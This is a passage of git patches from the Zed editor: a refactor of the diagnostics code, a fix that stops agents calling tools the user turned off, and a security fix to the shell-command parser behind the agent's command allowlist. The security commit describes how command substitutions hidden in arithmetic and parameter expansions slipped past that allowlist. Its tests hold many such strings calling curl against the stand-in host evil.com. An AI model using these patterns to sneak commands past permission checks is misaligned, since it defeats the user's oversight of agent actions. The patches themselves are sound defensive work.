selections: Vec>, @@ -25098,16 +24617,6 @@ impl Editor { }; } - fn update_diagnostics_state(&mut self, window: &mut Window, cx: &mut Context<'_, Editor>) { - if !self.diagnostics_enabled() { - return; - } - self.refresh_active_diagnostics(cx); - self.refresh_inline_diagnostics(true, window, cx); - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - pub fn start_temporary_diff_override(&mut self) { self.load_diff_task.take(); self.temporary_diff_override = true; @@ -29637,16 +29146,6 @@ fn edit_prediction_fallback_text(edits: &[(Range, Arc)], cx: &App) } } -pub fn diagnostic_style(severity: lsp::DiagnosticSeverity, colors: &StatusColors) -> Hsla { - match severity { - lsp::DiagnosticSeverity::ERROR => colors.error, - lsp::DiagnosticSeverity::WARNING => colors.warning, - lsp::DiagnosticSeverity::INFORMATION => colors.info, - lsp::DiagnosticSeverity::HINT => colors.hint, - _ => colors.ignored, - } -} - pub fn styled_runs_for_code_label<'a>( label: &'a CodeLabel, syntax_theme: &'a theme::SyntaxTheme, diff --git a/crates/editor/src/editor/diagnostics.rs b/crates/editor/src/editor/diagnostics.rs new file mode 100644 index 00000000000000..b13b4b699f578c --- /dev/null +++ b/crates/editor/src/editor/diagnostics.rs @@ -0,0 +1,519 @@ +use super::*; + +pub trait DiagnosticRenderer { + fn render_group( + &self, + diagnostic_group: Vec>, + buffer_id: BufferId, + snapshot: EditorSnapshot, + editor: WeakEntity, + language_registry: Option>, + cx: &mut App, + ) -> Vec>; + + fn render_hover( + &self, + diagnostic_group: Vec>, + range: Range, + buffer_id: BufferId, + language_registry: Option>, + cx: &mut App, + ) -> Option>; + + fn open_link( + &self, + editor: &mut Editor, + link: SharedString, + window: &mut Window, + cx: &mut Context, + ); +} + +pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); +} + +pub(super) struct GlobalDiagnosticRenderer(Arc); + +impl GlobalDiagnosticRenderer { + pub(super) fn global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } +} + +impl gpui::Global for GlobalDiagnosticRenderer {} + +#[derive(Debug, Clone)] +pub(super) struct InlineDiagnostic { + pub(super) message: SharedString, + pub(super) group_id: usize, + pub(super) is_primary: bool, + pub(super) start: Point, + pub(super) severity: lsp::DiagnosticSeverity, +} + +#[derive(Debug, PartialEq, Eq)] +pub(super) struct ActiveDiagnosticGroup { + active_range: Range, + active_message: String, + group_id: usize, + blocks: HashSet, +} + +#[derive(Debug, PartialEq, Eq)] +pub(super) enum ActiveDiagnostic { + None, + All, + Group(ActiveDiagnosticGroup), +} + +impl Editor { + pub fn go_to_diagnostic( + &mut self, + action: &GoToDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() { + return; + } + self.go_to_diagnostic_impl(Direction::Next, action.severity, window, cx) + } + + pub fn go_to_prev_diagnostic( + &mut self, + action: &GoToPreviousDiagnostic, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() { + return; + } + self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) + } + + pub fn go_to_diagnostic_impl( + &mut self, + direction: Direction, + severity: GoToDiagnosticSeverityFilter, + window: &mut Window, + cx: &mut Context, + ) { + let buffer = self.buffer.read(cx).snapshot(cx); + let selection = self + .selections + .newest::(&self.display_snapshot(cx)); + + let mut active_group_id = None; + if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics + && active_group.active_range.start.to_offset(&buffer) == selection.start + { + active_group_id = Some(active_group.group_id); + } + + fn filtered<'a>( + severity: GoToDiagnosticSeverityFilter, + diagnostics: impl Iterator>, + ) -> impl Iterator> { + diagnostics + .filter(move |entry| severity.matches(entry.diagnostic.severity)) + .filter(|entry| entry.range.start != entry.range.end) + .filter(|entry| !entry.diagnostic.is_unnecessary) + } + + let before = filtered( + severity, + buffer + .diagnostics_in_range(MultiBufferOffset(0)..selection.start) + .filter(|entry| entry.range.start <= selection.start), + ); + let after = filtered( + severity, + buffer + .diagnostics_in_range(selection.start..buffer.len()) + .filter(|entry| entry.range.start >= selection.start), + ); + + let mut found: Option> = None; + if direction == Direction::Prev { + 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] + { + for diagnostic in prev_diagnostics.into_iter().rev() { + if diagnostic.range.start != selection.start + || active_group_id + .is_some_and(|active| diagnostic.diagnostic.group_id < active) + { + found = Some(diagnostic); + break 'outer; + } + } + } + } else { + for diagnostic in after.chain(before) { + if diagnostic.range.start != selection.start + || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) + { + found = Some(diagnostic); + break; + } + } + } + let Some(next_diagnostic) = found else { + return; + }; + + let next_diagnostic_start = buffer.anchor_after(next_diagnostic.range.start); + let Some((buffer_anchor, _)) = buffer.anchor_to_buffer_anchor(next_diagnostic_start) else { + return; + }; + let buffer_id = buffer_anchor.buffer_id; + let snapshot = self.snapshot(window, cx); + if snapshot.intersects_fold(next_diagnostic.range.start) { + self.unfold_ranges( + std::slice::from_ref(&next_diagnostic.range), + true, + false, + cx, + ); + } + self.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![ + next_diagnostic.range.start..next_diagnostic.range.start, + ]) + }); + self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); + self.refresh_edit_prediction(false, true, window, cx); + } + + #[cfg(any(test, feature = "test-support"))] + pub fn active_diagnostic_message(&self) -> Option<&str> { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group.active_message.as_str()), + _ => None, + } + } + + pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { + if !self.diagnostics_enabled() { + return; + } + self.dismiss_diagnostics(cx); + self.active_diagnostics = ActiveDiagnostic::All; + } + + /// Disable inline diagnostics rendering for this editor. + pub fn disable_inline_diagnostics(&mut self) { + self.inline_diagnostics_enabled = false; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn disable_diagnostics(&mut self, cx: &mut Context) { + self.diagnostics_enabled = false; + self.dismiss_diagnostics(cx); + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn diagnostics_enabled(&self) -> bool { + self.diagnostics_enabled && self.lsp_data_enabled() + } + + pub fn inline_diagnostics_enabled(&self) -> bool { + self.inline_diagnostics_enabled && self.diagnostics_enabled() + } + + pub fn show_inline_diagnostics(&self) -> bool { + self.show_inline_diagnostics + } + + pub fn toggle_inline_diagnostics( + &mut self, + _: &ToggleInlineDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_diagnostics = !self.show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + pub fn set_max_diagnostics_severity(&mut self, severity: DiagnosticSeverity, cx: &mut App) { + self.diagnostics_max_severity = severity; + self.display_map.update(cx, |display_map, _| { + display_map.diagnostics_max_severity = self.diagnostics_max_severity; + }); + } + + pub fn toggle_diagnostics( + &mut self, + _: &ToggleDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + let diagnostics_enabled = + self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; + self.diagnostics_enabled = !diagnostics_enabled; + + let new_severity = if self.diagnostics_enabled { + EditorSettings::get_global(cx) + .diagnostics_max_severity + .filter(|severity| severity != &DiagnosticSeverity::Off) + .unwrap_or(DiagnosticSeverity::Hint) + } else { + DiagnosticSeverity::Off + }; + self.set_max_diagnostics_severity(new_severity, cx); + if self.diagnostics_enabled { + self.active_diagnostics = ActiveDiagnostic::None; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } else { + self.refresh_inline_diagnostics(false, window, cx); + } + + cx.notify(); + } + + pub(super) fn all_diagnostics_active(&self) -> bool { + self.active_diagnostics == ActiveDiagnostic::All + } + + pub(super) fn active_diagnostic_group_id(&self) -> Option { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group.group_id), + _ => None, + } + } + + pub(super) fn has_active_diagnostic_group(&self) -> bool { + matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) + } + + pub(super) fn refresh_active_diagnostics(&mut self, cx: &mut Context) { + if !self.diagnostics_enabled() { + return; + } + + if let ActiveDiagnostic::Group(active_diagnostics) = &mut self.active_diagnostics { + let buffer = self.buffer.read(cx).snapshot(cx); + let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); + let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); + let is_valid = buffer + .diagnostics_in_range::(primary_range_start..primary_range_end) + .any(|entry| { + entry.diagnostic.is_primary + && !entry.range.is_empty() + && entry.range.start == primary_range_start + && entry.diagnostic.message == active_diagnostics.active_message + }); + + if !is_valid { + self.dismiss_diagnostics(cx); + } + } + } + + pub(super) fn activate_diagnostics( + &mut self, + buffer_id: BufferId, + diagnostic: DiagnosticEntryRef<'_, MultiBufferOffset>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.diagnostics_enabled() || matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + } + self.dismiss_diagnostics(cx); + let snapshot = self.snapshot(window, cx); + let buffer = self.buffer.read(cx).snapshot(cx); + let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { + return; + }; + + let diagnostic_group = buffer + .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) + .collect::>(); + + let language_registry = self + .project() + .map(|project| project.read(cx).languages().clone()); + + let blocks = renderer.render_group( + diagnostic_group, + buffer_id, + snapshot, + cx.weak_entity(), + language_registry, + cx, + ); + + let blocks = self.display_map.update(cx, |display_map, cx| { + display_map.insert_blocks(blocks, cx).into_iter().collect() + }); + self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { + active_range: buffer.anchor_before(diagnostic.range.start) + ..buffer.anchor_after(diagnostic.range.end), + active_message: diagnostic.diagnostic.message.clone(), + group_id: diagnostic.diagnostic.group_id, + blocks, + }); + cx.notify(); + } + + pub(super) fn dismiss_diagnostics(&mut self, cx: &mut Context) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + }; + + let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); + if let ActiveDiagnostic::Group(group) = prev { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(group.blocks, cx); + }); + cx.notify(); + } + } + + pub(super) fn refresh_inline_diagnostics( + &mut self, + debounce: bool, + window: &mut Window, + cx: &mut Context, + ) { + let max_severity = ProjectSettings::get_global(cx) + .diagnostics + .inline + .max_severity + .unwrap_or(self.diagnostics_max_severity); + + if !self.inline_diagnostics_enabled() + || !self.diagnostics_enabled() + || !self.show_inline_diagnostics + || max_severity == DiagnosticSeverity::Off + { + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + return; + } + + let debounce_ms = ProjectSettings::get_global(cx) + .diagnostics + .inline + .update_debounce_ms; + let debounce = if debounce && debounce_ms > 0 { + Some(Duration::from_millis(debounce_ms)) + } else { + None + }; + self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { + if let Some(debounce) = debounce { + cx.background_executor().timer(debounce).await; + } + let Some(snapshot) = editor.upgrade().map(|editor| { + editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + }) else { + return; + }; + + let new_inline_diagnostics = cx + .background_spawn(async move { + let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); + for diagnostic_entry in + snapshot.diagnostics_in_range(MultiBufferOffset(0)..snapshot.len()) + { + let message = diagnostic_entry + .diagnostic + .message + .split_once('\n') + .map(|(line, _)| line) + .map(SharedString::new) + .unwrap_or_else(|| { + SharedString::new(&*diagnostic_entry.diagnostic.message) + }); + let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); + let (Ok(i) | Err(i)) = inline_diagnostics + .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); + inline_diagnostics.insert( + i, + ( + start_anchor, + InlineDiagnostic { + message, + group_id: diagnostic_entry.diagnostic.group_id, + start: diagnostic_entry.range.start.to_point(&snapshot), + is_primary: diagnostic_entry.diagnostic.is_primary, + severity: diagnostic_entry.diagnostic.severity, + }, + ), + ); + } + inline_diagnostics + }) + .await; + + editor + .update(cx, |editor, cx| { + editor.inline_diagnostics = new_inline_diagnostics; + cx.notify(); + }) + .ok(); + }); + } + + pub(super) fn pull_diagnostics( + &mut self, + buffer_id: BufferId, + _window: &Window, + cx: &mut Context, + ) -> Option<()> { + // `ActiveDiagnostic::All` is a special mode where editor's diagnostics are managed by the external view, + // skip any LSP updates for it. + + if self.active_diagnostics == ActiveDiagnostic::All || !self.diagnostics_enabled() { + return None; + } + let pull_diagnostics_settings = ProjectSettings::get_global(cx) + .diagnostics + .lsp_pull_diagnostics; + if !pull_diagnostics_settings.enabled { + return None; + } + let debounce = Duration::from_millis(pull_diagnostics_settings.debounce_ms); + let project = self.project()?.downgrade(); + let buffer = self.buffer().read(cx).buffer(buffer_id)?; + + self.pull_diagnostics_task = cx.spawn(async move |_, cx| { + cx.background_executor().timer(debounce).await; + if let Ok(task) = project.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.pull_diagnostics_for_buffer(buffer, cx) + }) + }) { + task.await.log_err(); + } + project + .update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.pull_document_diagnostics_for_buffer_edit(buffer_id, cx); + }) + }) + .log_err(); + }); + + Some(()) + } + + pub(super) fn update_diagnostics_state( + &mut self, + window: &mut Window, + cx: &mut Context<'_, Editor>, + ) { + if !self.diagnostics_enabled() { + return; + } + self.refresh_active_diagnostics(cx); + self.refresh_inline_diagnostics(true, window, cx); + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } +} diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 9db33bb9ba7e84..7e751535910420 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -1,11 +1,11 @@ use crate::{ - ActiveDiagnostic, BUFFER_HEADER_PADDING, BlockId, CURSORS_VISIBLE_FOR, ChunkRendererContext, - ChunkReplacement, CodeActionSource, ColumnarMode, ConflictsOurs, ConflictsOursMarker, - ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker, ContextMenuPlacement, CursorShape, - CustomBlockId, DisplayDiffHunk, DisplayPoint, DisplayRow, EditDisplayMode, EditPrediction, - Editor, EditorMode, EditorSettings, EditorSnapshot, EditorStyle, FILE_HEADER_HEIGHT, - FocusedBlock, GutterDimensions, GutterHoverButton, HalfPageDown, HalfPageUp, HandleInput, - HoveredCursor, InlayHintRefreshReason, JumpData, LineDown, LineHighlight, LineUp, MAX_LINE_LEN, + BUFFER_HEADER_PADDING, BlockId, CURSORS_VISIBLE_FOR, ChunkRendererContext, ChunkReplacement, + CodeActionSource, ColumnarMode, ConflictsOurs, ConflictsOursMarker, ConflictsOuter, + ConflictsTheirs, ConflictsTheirsMarker, ContextMenuPlacement, CursorShape, CustomBlockId, + DisplayDiffHunk, DisplayPoint, DisplayRow, EditDisplayMode, EditPrediction, Editor, EditorMode, + EditorSettings, EditorSnapshot, EditorStyle, FILE_HEADER_HEIGHT, FocusedBlock, + GutterDimensions, GutterHoverButton, HalfPageDown, HalfPageUp, HandleInput, HoveredCursor, + InlayHintRefreshReason, JumpData, LineDown, LineHighlight, LineUp, MAX_LINE_LEN, MINIMAP_FONT_SIZE, MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, OpenExcerpts, PageDown, PageUp, PhantomDiffReviewIndicator, Point, RowExt, RowRangeExt, SelectPhase, Selection, SelectionDragState, SelectionEffects, SizingBehavior, SoftWrap, StickyHeaderExcerpt, ToPoint, @@ -2498,12 +2498,7 @@ impl EditorElement { None => return HashMap::default(), }; - let active_diagnostics_group = - if let ActiveDiagnostic::Group(group) = &self.editor.read(cx).active_diagnostics { - Some(group.group_id) - } else { - None - }; + let active_diagnostics_group = self.editor.read(cx).active_diagnostic_group_id(); let diagnostics_by_rows = self.editor.update(cx, |editor, cx| { let snapshot = editor.snapshot(window, cx); diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index e43ae09c0d6526..cfa7284127e968 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -1,6 +1,6 @@ use crate::{ - ActiveDiagnostic, Anchor, AnchorRangeExt, DisplayPoint, DisplayRow, Editor, EditorSettings, - EditorSnapshot, GlobalDiagnosticRenderer, HighlightKey, Hover, + Anchor, AnchorRangeExt, DisplayPoint, DisplayRow, Editor, EditorSettings, EditorSnapshot, + GlobalDiagnosticRenderer, HighlightKey, Hover, display_map::{InlayOffset, ToDisplayPoint, is_invisible}, editor_settings::EditorSettingsScrollbarProxy, hover_links::{InlayHighlight, RangeInEditor}, @@ -319,12 +319,8 @@ fn show_hover( } let hover_popover_delay = EditorSettings::get_global(cx).hover_popover_delay.0; - let all_diagnostics_active = editor.active_diagnostics == ActiveDiagnostic::All; - let active_group_id = if let ActiveDiagnostic::Group(group) = &editor.active_diagnostics { - Some(group.group_id) - } else { - None - }; + let all_diagnostics_active = editor.all_diagnostics_active(); + let active_group_id = editor.active_diagnostic_group_id(); let renderer = GlobalDiagnosticRenderer::global(cx); let task = cx.spawn_in(window, async move |this, cx| { From ac0e90b0585f1f713a3c7241ba5c3d8d24552360 Mon Sep 17 00:00:00 2001 From: Om Chillure Date: Tue, 5 May 2026 21:53:03 +0530 Subject: [PATCH 203/231] Fix agent being able to execute tools that are turned off (#54863) #### Closes #54741 Fix disabled context server tools being callable in profiles with `enable_all_context_servers: true` `AgentProfileSettings::is_context_server_tool_enabled` short-circuited on `enable_all_context_servers` and ignored explicit per-tool `false` entries in `context_servers`, so agents could still call tools the user had disabled in their profile. The filter now matches what the tool picker UI already does (`tool_picker.rs:357-371`): the explicit per-tool setting wins, and `enable_all_context_servers` is only consulted as a fallback when the tool has no explicit entry. ### Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Screenshots : When turned false 1 When true 2 Release Notes: - Fixed agent profiles with `enable_all_context_servers: true` ignoring per-tool `false` overrides in `context_servers`, allowing agents to call tools the user had explicitly disabled. Co-authored-by: Bennet Bo Fenner --- crates/agent_settings/src/agent_profile.rs | 58 ++++++++++++++++++++-- 1 file changed, 53 insertions(+), 5 deletions(-) diff --git a/crates/agent_settings/src/agent_profile.rs b/crates/agent_settings/src/agent_profile.rs index aff666e01111dc..ca448ca85710aa 100644 --- a/crates/agent_settings/src/agent_profile.rs +++ b/crates/agent_settings/src/agent_profile.rs @@ -117,11 +117,10 @@ impl AgentProfileSettings { } pub fn is_context_server_tool_enabled(&self, server_id: &str, tool_name: &str) -> bool { - self.enable_all_context_servers - || self - .context_servers - .get(server_id) - .is_some_and(|preset| preset.tools.get(tool_name) == Some(&true)) + self.context_servers + .get(server_id) + .and_then(|preset| preset.tools.get(tool_name).copied()) + .unwrap_or(self.enable_all_context_servers) } pub fn save_to_settings( @@ -200,3 +199,52 @@ impl From for ContextServerPreset { } } } + +#[cfg(test)] +mod tests { + use super::*; + + fn profile( + enable_all_context_servers: bool, + context_servers: IndexMap, ContextServerPreset>, + ) -> AgentProfileSettings { + AgentProfileSettings { + name: "test".into(), + tools: IndexMap::default(), + enable_all_context_servers, + context_servers, + default_model: None, + } + } + + fn preset(tools: &[(&str, bool)]) -> ContextServerPreset { + ContextServerPreset { + tools: tools + .iter() + .map(|(name, enabled)| (Arc::from(*name), *enabled)) + .collect(), + } + } + + #[test] + fn explicit_false_disables_tool_when_enable_all_is_true() { + let mut servers = IndexMap::default(); + servers.insert(Arc::from("server"), preset(&[("disabled_tool", false)])); + let profile = profile(true, servers); + + assert!(!profile.is_context_server_tool_enabled("server", "disabled_tool")); + assert!(profile.is_context_server_tool_enabled("server", "other_tool")); + assert!(profile.is_context_server_tool_enabled("other_server", "any_tool")); + } + + #[test] + fn explicit_true_enables_tool_when_enable_all_is_false() { + let mut servers = IndexMap::default(); + servers.insert(Arc::from("server"), preset(&[("enabled_tool", true)])); + let profile = profile(false, servers); + + assert!(profile.is_context_server_tool_enabled("server", "enabled_tool")); + assert!(!profile.is_context_server_tool_enabled("server", "other_tool")); + assert!(!profile.is_context_server_tool_enabled("other_server", "any_tool")); + } +} From b2822d98c1649f3088dd0571e2c3c3c9ab88cd44 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Tue, 5 May 2026 12:25:56 -0400 Subject: [PATCH 204/231] Extract nested command substitutions from arithmetic expansions (#54690) Bash arithmetic expansion `$((...))` can contain command substitutions like `$(curl evil.com)`. Previously, `extract_commands_from_word_piece` treated `ArithmeticExpression` as a no-op, so nested commands inside `$(( ... ))` were never extracted for allowlist checking. This fix re-parses the `ArithmeticExpression` value string using `brush_parser::word::parse` and recursively extracts any embedded command substitutions, mirroring how `CommandSubstitution` and `DoubleQuotedSequence` are already handled. Closes SEC-267 Release Notes: - Commands nested inside bash arithmetic expansions (e.g. `$(($(curl example.com)))`) are now understood by the tool-calling permissions regexes. --- .../src/shell_command_parser.rs | 177 +++++++++++++++++- 1 file changed, 174 insertions(+), 3 deletions(-) diff --git a/crates/shell_command_parser/src/shell_command_parser.rs b/crates/shell_command_parser/src/shell_command_parser.rs index 2ab42dd36bb10c..e4e80d095ee7b3 100644 --- a/crates/shell_command_parser/src/shell_command_parser.rs +++ b/crates/shell_command_parser/src/shell_command_parser.rs @@ -875,13 +875,101 @@ fn extract_commands_from_word_piece(piece: &WordPiece, commands: &mut Vec { + // The arithmetic body may contain `$(...)` or `${...}` that bash will + // evaluate before doing arithmetic. Re-parse to extract those. + // We propagate parse failures with `?` so that callers fail closed + // (treating the whole input as a parse failure) rather than silently + // dropping commands hidden inside content brush couldn't tokenize. + extract_commands_from_word_string(&expr.value, commands)?; + } + WordPiece::ParameterExpansion(expr) => { + extract_commands_from_parameter_expr(expr, commands)?; + } WordPiece::EscapeSequence(_) | WordPiece::SingleQuotedText(_) | WordPiece::Text(_) | WordPiece::AnsiCQuotedText(_) - | WordPiece::TildePrefix(_) - | WordPiece::ParameterExpansion(_) - | WordPiece::ArithmeticExpression(_) => {} + | WordPiece::TildePrefix(_) => {} + } + Some(()) +} + +/// Re-parses a string as a bash word and recurses into its pieces to extract +/// any nested command substitutions. Returns `None` (failing closed) if brush +/// cannot tokenize the input, so callers treat allowlist decisions about this +/// input as untrusted. +fn extract_commands_from_word_string(s: &str, commands: &mut Vec) -> Option<()> { + let options = ParserOptions::default(); + let pieces = brush_parser::word::parse(s, &options).ok()?; + for inner_piece in pieces { + extract_commands_from_word_piece(&inner_piece.piece, commands)?; + } + Some(()) +} + +/// Recurses into the string-typed fields of a parameter expansion that bash +/// will subject to command substitution at expansion time, mirroring the +/// arithmetic expansion handling. Failing to extend this when adding new +/// `ParameterExpr` variants risks an allowlist bypass via e.g. +/// `${V:-$(curl evil)}`, `${V/pat/$(curl evil)}`, `${V:$(($(curl))):1}`. +fn extract_commands_from_parameter_expr( + expr: &brush_parser::word::ParameterExpr, + commands: &mut Vec, +) -> Option<()> { + use brush_parser::word::ParameterExpr; + match expr { + ParameterExpr::Parameter { .. } + | ParameterExpr::ParameterLength { .. } + | ParameterExpr::Transform { .. } + | ParameterExpr::VariableNames { .. } + | ParameterExpr::MemberKeys { .. } => {} + ParameterExpr::UseDefaultValues { default_value, .. } + | ParameterExpr::AssignDefaultValues { default_value, .. } => { + if let Some(value) = default_value { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::IndicateErrorIfNullOrUnset { error_message, .. } => { + if let Some(value) = error_message { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::UseAlternativeValue { + alternative_value, .. + } => { + if let Some(value) = alternative_value { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::RemoveSmallestSuffixPattern { pattern, .. } + | ParameterExpr::RemoveLargestSuffixPattern { pattern, .. } + | ParameterExpr::RemoveSmallestPrefixPattern { pattern, .. } + | ParameterExpr::RemoveLargestPrefixPattern { pattern, .. } + | ParameterExpr::UppercaseFirstChar { pattern, .. } + | ParameterExpr::UppercasePattern { pattern, .. } + | ParameterExpr::LowercaseFirstChar { pattern, .. } + | ParameterExpr::LowercasePattern { pattern, .. } => { + if let Some(pattern) = pattern { + extract_commands_from_word_string(pattern, commands)?; + } + } + ParameterExpr::Substring { offset, length, .. } => { + extract_commands_from_word_string(&offset.value, commands)?; + if let Some(length) = length { + extract_commands_from_word_string(&length.value, commands)?; + } + } + ParameterExpr::ReplaceSubstring { + pattern, + replacement, + .. + } => { + extract_commands_from_word_string(pattern, commands)?; + if let Some(replacement) = replacement { + extract_commands_from_word_string(replacement, commands)?; + } + } } Some(()) } @@ -1754,4 +1842,87 @@ mod tests { TerminalCommandValidation::Unsafe ); } + + #[test] + fn test_arithmetic_expansion_nested_command_substitution() { + let commands = extract_commands("echo $(($(curl evil.com)))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_arithmetic_expansion_nested_backtick_substitution() { + let commands = extract_commands("echo $((`whoami`))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.contains(&"whoami".to_string())); + } + + #[test] + fn test_arithmetic_expansion_without_substitution() { + let commands = extract_commands("echo $((1+2))").expect("parse failed"); + assert_eq!(commands, vec!["echo $((1+2))"]); + } + + #[test] + fn test_arithmetic_expansion_doubly_nested_command_substitution() { + let commands = extract_commands("echo $(($(($(curl evil.com)))))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_arithmetic_expansion_inside_double_quotes() { + let commands = extract_commands("echo \"$(($(curl evil.com)))\"").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_default_value_extracts_command_substitution() { + let commands = extract_commands("echo ${V:-$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_assign_default_extracts_command_substitution() { + let commands = extract_commands("echo ${V:=$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_alternative_value_extracts_command_substitution() { + let commands = extract_commands("echo ${V:+$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_error_message_extracts_command_substitution() { + let commands = extract_commands("echo ${V:?$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_replacement_extracts_command_substitution() { + let commands = extract_commands("echo ${V/x/$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_suffix_pattern_extracts_command_substitution() { + let commands = extract_commands("echo ${V%$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_substring_offset_extracts_command_substitution() { + let commands = extract_commands("echo ${V:$(($(curl evil.com))):1}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } } From ab4fd8dac3ee20554f61e72c77bc8cb4f40b80c3 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 5 May 2026 20:10:03 +0300 Subject: [PATCH 205/231] ep: Fix V0420 Diagnostics format (#55798) - Truncated diagnostics to fit ~2000 tokens - Moved the diagnostics section before the cursor snippet - Increased total tokens limit for this prompt to 8192 tokens Release Notes: - N/A Co-authored-by: Ben Kunkle --- crates/zeta_prompt/src/zeta_prompt.rs | 142 ++++++++++++++++++++------ 1 file changed, 113 insertions(+), 29 deletions(-) diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index 12767122fc4059..7bc37ff698c86b 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -30,6 +30,25 @@ fn apply_prompt_budget_margin(max_tokens: usize) -> usize { (max_tokens as f64 * 0.9).floor() as usize } +/// Ensure text fits into the tokens budget; trim by line boundaries if needed. +pub fn clamp_text_to_token_count(text: &str, max_tokens: usize) -> &str { + if estimate_tokens(text.len()) <= max_tokens { + return text; + } + + let mut end_byte_offset = 0; + + for line in text.split_inclusive('\n') { + if estimate_tokens(line.len() + end_byte_offset) > max_tokens { + break; + } + + end_byte_offset += line.len(); + } + + &text[..end_byte_offset] +} + #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct ZetaPromptInput { pub cursor_path: Arc, @@ -247,8 +266,8 @@ pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0331SeedCoderModelPy - | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0420Diagnostics => 4096, + | 